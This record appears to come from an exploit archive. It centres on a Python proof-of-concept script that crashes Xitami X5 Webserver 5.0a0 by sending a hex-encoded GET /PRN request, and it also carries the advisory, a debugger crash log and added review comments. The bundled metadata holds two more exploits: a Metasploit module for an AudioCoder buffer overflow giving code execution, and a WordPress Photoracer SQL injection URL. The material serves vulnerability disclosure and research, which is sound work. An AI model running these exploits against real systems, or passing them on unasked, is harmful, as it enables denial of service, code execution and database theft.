ID 1337DAY-ID-26448
Type zdt
Reporter Stefan Petrushevski
Modified 2016-12-01T00:00:00
Description
Exploit for windows platform in category dos / poc
#!/usr/bin/env python
#
#
# X5 Webserver 5.0 Remote Denial Of Service Exploit
#
#
# Vendor: iMatix
# Product web page: http://www.xitami.com
# Affected version: 5.0a0
#
# Summary: X5 is the latest generation web server from iMatix Corporation.
# The Xitami product line stretches back to 1996. X5 is built using iMatix's
# current Base2 technology for multithreading applications. On multicore machines,
# it is much more scalable than Xitami/2.
#
# Desc: The vulnerability is caused due to a NULL pointer dereference when processing
# malicious HEAD and GET requests. This can be exploited to cause denial of service
# scenario.
#
# ----------------------------------------------------------------------------
#
# (12c0.164c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
# eax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c
# eip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
# xitami+0x103ae0:
# 00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=????????
# 0:004> kb
# # ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0
# 01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6
# 02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa
# 03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1
# 04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3
# 05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293
# 06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234
# 07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe
# 08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70
# 09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b
#
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Stefan Petrushevski aka sm - <[email protected]>
#
#
# Advisory ID: ZSL-2016-5377
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php
#
#
# 15.11.2016
#
import sys, socket

# Usage banner: the script wants exactly two positional arguments, a target
# host and a TCP port, and exits before touching the network otherwise.
# NOTE(review): this is Python 2 syntax (print statement, str payload); it
# does not run unmodified under Python 3.
if len(sys.argv) < 3:
    print '------- X5 Webserver 5.0a0 - Remote Denial of Service ------\n'
    print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
    print 'Example: ' + sys.argv[0] + ' 8.8.8.8 80\n'
    print '------------------------------------------------------------\n'
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])  # a non-numeric port raises ValueError; nothing catches it

# A single plain TCP connection.  Nothing is ever read back, so a successful
# send() says nothing about whether the server actually faulted.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((host, port))  # connect() returns None; `connect` is never used
s.settimeout(666)  # set after connect(), so it cannot bound the connect itself

# Hex-escaped HTTP/1.1 request.  It decodes to a GET whose request target is
# the Windows reserved device name "PRN", followed by ordinary browser-style
# headers (Accept*, Keep-Alive: 300, Connection: keep-alive).  The Host header
# is hard-coded to the author's lab address 172.19.0.215 rather than derived
# from `host`, and the User-Agent is "ZSL-Fuzzer-Agent/4.0.285".
# Detection note: a request line whose path is a reserved device name is
# unusual traffic worth alerting on at a reverse proxy or WAF.
payload = (
'\x47\x45\x54\x20\x2f\x50\x52\x4e\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a'
'\x48\x6f\x73\x74\x3a\x20\x31\x37\x32\x2e\x31\x39\x2e\x30\x2e\x32\x31\x35\x0d'
'\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x5a\x53\x4c\x2d\x46\x75'
'\x7a\x7a\x65\x72\x2d\x41\x67\x65\x6e\x74\x2f\x34\x2e\x30\x2e\x32\x38\x35\x20'
'\x0d\x0a\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x78\x6d\x6c\x2c'
'\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x2c\x61\x70\x70'
'\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c'
'\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x74\x65\x78'
'\x74\x2f\x70\x6c\x61\x69\x6e\x3b\x71\x3d\x30\x2e\x38\x2c\x69\x6d\x61\x67\x65'
'\x2f\x70\x6e\x67\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63'
'\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x75\x73'
'\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45'
'\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x64\x65\x66\x6c\x61'
'\x74\x65\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a'
'\x20\x49\x53\x4f\x2d\x38\x38\x35\x39\x2d\x31\x2c\x75\x74\x66\x2d\x38\x3b\x71'
'\x3d\x30\x2e\x37\x2c\x2a\x3b\x71\x3d\x30\x2e\x37\x0d\x0a\x4b\x65\x65\x70\x2d'
'\x41\x6c\x69\x76\x65\x3a\x20\x33\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74'
'\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x0d\x0a\x0d\x0a'
)
s.send(payload)  # send() may write fewer bytes than len(payload); the return value is ignored
s.close  # NOTE(review): missing "()", so this is a no-op and the socket is never explicitly closed
print 'BOOM! \n'  # printed unconditionally; it does not reflect any observed server state
# 0day.today [2018-04-12] #
{"sourceData": "#!/usr/bin/env python\r\n#\r\n#\r\n# X5 Webserver 5.0 Remote Denial Of Service Exploit\r\n#\r\n#\r\n# Vendor: iMatrix\r\n# Product web page: http://www.xitami.com\r\n# Affected version: 5.0a0\r\n#\r\n# Summary: X5 is the latest generation web server from iMatix Corporation.\r\n# The Xitami product line stretches back to 1996. X5 is built using iMatix's\r\n# current Base2 technology for multithreading applications. On multicore machines,\r\n# it is much more scalable than Xitami/2.\r\n#\r\n# Desc: The vulnerability is caused due to a NULL pointer dereference when processing\r\n# malicious HEAD and GET requests. This can be exploited to cause denial of service\r\n# scenario.\r\n#\r\n# ----------------------------------------------------------------------------\r\n#\r\n# (12c0.164c): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# *** WARNING: Unable to verify checksum for C:\\zslab\\ws\\64327\\xitami-5.0a0-windows\\xitami.exe\r\n# *** ERROR: Module load completed but symbols could not be loaded for C:\\zslab\\ws\\64327\\xitami-5.0a0-windows\\xitami.exe\r\n# eax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c\r\n# eip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc\r\n# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\n# xitami+0x103ae0:\r\n# 00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=????????\r\n# 0:004> kb\r\n# # ChildEBP RetAddr Args to Child \r\n# WARNING: Stack unwind information not available. 
Following frames may be wrong.\r\n# 00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0\r\n# 01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6\r\n# 02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa\r\n# 03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1\r\n# 04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3\r\n# 05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293\r\n# 06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234\r\n# 07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe\r\n# 08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70\r\n# 09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b\r\n#\r\n# ----------------------------------------------------------------------------\r\n#\r\n# Tested on: Microsoft Windows XP Professional SP3 (EN)\r\n# Microsoft Windows 7 Ultimate SP1 (EN)\r\n#\r\n#\r\n# Vulnerability discovered by Stefan Petrushevski aka sm - <[email\u00a0protected]>\r\n#\r\n#\r\n# Advisory ID: ZSL-2016-5377\r\n# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php\r\n#\r\n#\r\n# 15.11.2016\r\n#\r\n \r\n \r\nimport sys, socket\r\n \r\nif len(sys.argv) < 3:\r\n print '------- X5 Webserver 5.0a0 - Remote Denial of Service ------\\n'\r\n print '\\nUsage: ' + sys.argv[0] + ' <target> <port>\\n'\r\n print 'Example: ' + sys.argv[0] + ' 8.8.8.8 80\\n'\r\n print '------------------------------------------------------------\\n'\r\n sys.exit(0)\r\n \r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnect = s.connect((host, port))\r\ns.settimeout(666)\r\npayload = 
(\r\n'\\x47\\x45\\x54\\x20\\x2f\\x50\\x52\\x4e\\x20\\x48\\x54\\x54\\x50\\x2f\\x31\\x2e\\x31\\x0d\\x0a'\r\n'\\x48\\x6f\\x73\\x74\\x3a\\x20\\x31\\x37\\x32\\x2e\\x31\\x39\\x2e\\x30\\x2e\\x32\\x31\\x35\\x0d'\r\n'\\x0a\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x5a\\x53\\x4c\\x2d\\x46\\x75'\r\n'\\x7a\\x7a\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x2f\\x34\\x2e\\x30\\x2e\\x32\\x38\\x35\\x20'\r\n'\\x0d\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x3a\\x20\\x74\\x65\\x78\\x74\\x2f\\x78\\x6d\\x6c\\x2c'\r\n'\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2f\\x78\\x6d\\x6c\\x2c\\x61\\x70\\x70'\r\n'\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2f\\x78\\x68\\x74\\x6d\\x6c\\x2b\\x78\\x6d\\x6c\\x2c'\r\n'\\x74\\x65\\x78\\x74\\x2f\\x68\\x74\\x6d\\x6c\\x3b\\x71\\x3d\\x30\\x2e\\x39\\x2c\\x74\\x65\\x78'\r\n'\\x74\\x2f\\x70\\x6c\\x61\\x69\\x6e\\x3b\\x71\\x3d\\x30\\x2e\\x38\\x2c\\x69\\x6d\\x61\\x67\\x65'\r\n'\\x2f\\x70\\x6e\\x67\\x2c\\x2a\\x2f\\x2a\\x3b\\x71\\x3d\\x30\\x2e\\x35\\x0d\\x0a\\x41\\x63\\x63'\r\n'\\x65\\x70\\x74\\x2d\\x4c\\x61\\x6e\\x67\\x75\\x61\\x67\\x65\\x3a\\x20\\x65\\x6e\\x2d\\x75\\x73'\r\n'\\x2c\\x65\\x6e\\x3b\\x71\\x3d\\x30\\x2e\\x35\\x0d\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x2d\\x45'\r\n'\\x6e\\x63\\x6f\\x64\\x69\\x6e\\x67\\x3a\\x20\\x67\\x7a\\x69\\x70\\x2c\\x64\\x65\\x66\\x6c\\x61'\r\n'\\x74\\x65\\x0d\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x2d\\x43\\x68\\x61\\x72\\x73\\x65\\x74\\x3a'\r\n'\\x20\\x49\\x53\\x4f\\x2d\\x38\\x38\\x35\\x39\\x2d\\x31\\x2c\\x75\\x74\\x66\\x2d\\x38\\x3b\\x71'\r\n'\\x3d\\x30\\x2e\\x37\\x2c\\x2a\\x3b\\x71\\x3d\\x30\\x2e\\x37\\x0d\\x0a\\x4b\\x65\\x65\\x70\\x2d'\r\n'\\x41\\x6c\\x69\\x76\\x65\\x3a\\x20\\x33\\x30\\x30\\x0d\\x0a\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74'\r\n'\\x69\\x6f\\x6e\\x3a\\x20\\x6b\\x65\\x65\\x70\\x2d\\x61\\x6c\\x69\\x76\\x65\\x0d\\x0a\\x0d\\x0a'\r\n)\r\n \r\ns.send(payload)\r\ns.close\r\nprint 'BOOM! 
\\n'\n\n# 0day.today [2018-04-12] #", "history": [], "description": "Exploit for windows platform in category dos / poc", "sourceHref": "https://0day.today/exploit/26448", "reporter": "Stefan Petrushevski", "href": "https://0day.today/exploit/description/26448", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b0d3d3a91f21189719037cf41ad6dbfa"}, {"key": "href", "hash": "f9a3cf1561eda2dcefc37160e60a66c2"}, {"key": "modified", "hash": "7eeae43f51545714e368cafd698bfb86"}, {"key": "published", "hash": "7eeae43f51545714e368cafd698bfb86"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "089975fc26e8b18986388a085f20ef2b"}, {"key": "sourceData", "hash": "6b37b56268540bf5747156e1dd9d5e5e"}, {"key": "sourceHref", "hash": "8468e09b5450ca578caf02ba402296ae"}, {"key": "title", "hash": "f4431ed03bebd00789d64df9585cfdf2"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 8, "references": [], "lastseen": "2018-04-12T19:46:58", "published": "2016-12-01T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-26448", "hash": "f23629d31a9739bf0530745d526eda9d4a28ec29bbfb3336064806ee52e1254d", "modified": "2016-12-01T00:00:00", "title": "Xitami Web Server 5.0a0 - Denial of Service Exploit", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -1.5, "vector": "NONE", "modified": "2018-04-12T19:46:58"}, "dependencies": {"references": [{"type": "zeroscience", "idList": ["ZSL-2016-5377"]}, {"type": "zdt", "idList": ["1337DAY-ID-20955", "1337DAY-ID-5377"]}], "modified": "2018-04-12T19:46:58"}, "vulnersScore": -1.5}}
{"zeroscience": [{"lastseen": "2019-11-11T16:11:47", "bulletinFamily": "exploit", "description": "Title: X5 Webserver 5.0 Remote Denial Of Service Exploit \nAdvisory ID: [ZSL-2016-5377](<ZSL-2016-5377.php>) \nType: Local/Remote \nImpact: DoS \nRisk: (3/5) \nRelease Date: 30.11.2016 \n\n\n##### Summary\n\nX5 is the latest generation web server from iMatix Corporation. The Xitami product line stretches back to 1996. X5 is built using iMatix's current Base2 technology for multithreading applications. On multicore machines, it is much more scalable than Xitami/2. \n\n##### Description\n\nThe vulnerability is caused due to a NULL pointer dereference when processing malicious HEAD and GET requests. This can be exploited to cause denial of service scenario. \n \n\\-------------------------------------------------------------------------------- \n \n` (12c0.164c): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** WARNING: Unable to verify checksum for C:\\zslab\\ws\\64327\\xitami-5.0a0-windows\\xitami.exe \n*** ERROR: Module load completed but symbols could not be loaded for C:\\zslab\\ws\\64327\\xitami-5.0a0-windows\\xitami.exe \neax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c \neip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 \nxitami+0x103ae0: \n00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=???????? \n0:004> kb \n# ChildEBP RetAddr Args to Child \nWARNING: Stack unwind information not available. Following frames may be wrong. 
\n00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0 \n01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6 \n02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa \n03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1 \n04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3 \n05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293 \n06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234 \n07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe \n08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70 \n09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\niMatrix - <http://www.xitami.com>\n\n##### Affected Version\n\n5.0a0 \n\n##### Tested On\n\nMicrosoft Windows XP Professional SP3 (EN) \nMicrosoft Windows 7 Ultimate SP1 (EN) \n\n##### Vendor Status\n\n[15.11.2016] Vulnerability discovered. \n[17.11.2016] Vendor contacted. \n[29.11.2016] No response from the vendor. \n[30.11.2016] Public security advisory released. 
\n\n##### PoC\n\n[DxitamiD.py](<../../codes/xitami_dos.txt>)\n\n##### Credits\n\nVulnerability discovered by Stefan Petrushevski - <[stefan@zeroscience.mk](<mailto:stefan@zeroscience.mk>)>\n\n##### References\n\n[1] <https://cxsecurity.com/issue/WLB-2016120003> \n[2] <https://packetstormsecurity.com/files/139963> \n[3] <https://www.exploit-db.com/exploits/40849/> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/119453> \n[5] <http://www.securiteam.com/exploits/6Q02U1FHRU.html>\n\n##### Changelog\n\n[30.11.2016] - Initial release \n[08.12.2016] - Added reference [1], [2], [3] and [4] \n[13.12.2016] - Added reference [5] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2016-11-30T00:00:00", "published": "2016-11-30T00:00:00", "id": "ZSL-2016-5377", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php", "title": "X5 Webserver 5.0 Remote Denial Of Service Exploit", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/xitami_dos.txt"}], "zdt": 
[{"lastseen": "2018-01-05T15:31:25", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2013-07-01T00:00:00", "published": "2013-07-01T00:00:00", "id": "1337DAY-ID-20955", "href": "https://0day.today/exploit/description/20955", "type": "zdt", "title": "AudioCoder (.lst) - Buffer Overflow (msf)", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::Seh\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AudioCoder .lst Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability\r\n occurs when adding an .lst, allowing arbitrary code execution with the privileges\r\n of the user running AudioCoder. This module has been tested successfully on\r\n AudioCoder 0.8.22 over Windows XP SP3 and Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'onying', # Vulnerability discovery and PoC\r\n 'Asesino04' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'OSVDB', 'N/A' ],\r\n [ 'EDB', '26448' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process'\r\n },\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'Space' => 6596,\r\n 'BadChars' => \"\\x00\\x5c\\x40\\x0d\\x0a\",\r\n 'DisableNops' => true,\r\n 'StackAdjustment' => -3500,\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'AudioCoder 0.8.22 / Windows XP SP3 / Windows 7 SP1',\r\n {\r\n 'Ret' => 0x66011b56, # libiconv-2.dll\r\n 'Offset' => 765\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'juin 01 2013',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),\r\n ], self.class)\r\n \r\n end\r\n \r\n def exploit\r\n buffer = \"http://\"\r\n buffer << rand_text(target['Offset'])\r\n buffer << 
generate_seh_record(target.ret)\r\n buffer << payload.encoded\r\n \r\n file_create(buffer)\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/20955"}, {"lastseen": "2018-03-28T03:20:43", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-06-15T00:00:00", "published": "2009-06-15T00:00:00", "id": "1337DAY-ID-5377", "href": "https://0day.today/exploit/description/5377", "type": "zdt", "title": "WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability", "sourceData": "================================================================\r\nWordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability\r\n================================================================\r\n\r\n\r\nWordpress Photoracer Plugin => SQL injection\r\nhttp://wordpress.org/extend/plugins/photoracer/ \r\n\r\nAuthor: Kacper\r\n\r\nPozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, \r\n\r\nPozdro: Ratman, Kopaczka, FDJ\r\n\r\nElo: dla GLOBUSa za pomoc w crackowaniu hasel.\r\n\r\nVuln:\r\n\r\nhttp://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--\r\n\r\n\r\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5377"}]}